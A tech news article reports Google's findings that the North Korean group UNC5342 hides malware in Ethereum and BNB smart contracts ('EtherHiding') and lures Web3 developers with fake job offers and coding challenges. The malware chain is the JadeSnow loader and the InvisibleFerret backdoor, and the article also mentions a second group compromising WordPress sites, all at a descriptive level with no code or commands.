- UNC5342 uses blockchain smart contracts to deliver crypto-stealing malware via EtherHiding
- Fake jobs and coding challenges lure developers to trigger the JadeSnow loader and backdoor
- Blockchain’s immutability makes malware hosting resilient
North Korean state-sponsored threat actors are now using public blockchains to host malicious code and deploy malware on target endpoints.
This is according to Google’s Threat Intelligence Group (GTIG), which said it observed UNC5342 using Ethereum and BNB to host droppers and ultimately deploy cryptocurrency-stealing malware against software and blockchain developers.
The technique is called EtherHiding. Instead of sending a malicious file directly to the victim (or otherwise tricking them into downloading it), they encode parts of the malware into blockchain transactions and smart contracts.
Development of bulletproof hosting
The smart contract itself does not automatically execute malware on someone else’s computer, but it does can deliver instructions or code when a user interacts with it (when they click a link, run a script, or connect a crypto wallet).
Blockchain is a great place to store and distribute malware as it is public, immutable and almost impossible to manipulate.
“This represents a shift towards next-generation bulletproof hosting,” Google said, stressing that blockchain’s resilient nature is what makes it so alluring to cybercriminals.
Starting in February, UNC5342 was observed creating fake jobs and coding challenges, tricking developers and others working in the Web3 space into downloading various files. These files connect to the blockchain and retrieve the code, which in turn installs the JadeSnow loader. This loader drops the InvisibleFerret backdoor, which was already observed being used in cryptocurrency thefts.
This isn’t the first time we’ve seen blockchain being used to deliver malware. The technique has been in use since 2023, and in the same report Google also mentioned a financially motivated actor UNC5142 using the same technique.
This group was seen compromising WordPress websites to host malicious JavaScript code that was connected to the blockchain. More than 14,000 infected sites were found so far.
North Korea is known for attacking the crypto industry and using the stolen funds to fund its weapons program and state apparatus.
Via The record
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews and opinions in your feeds. Be sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, video unboxings, and get regular updates from us on WhatsApp also.
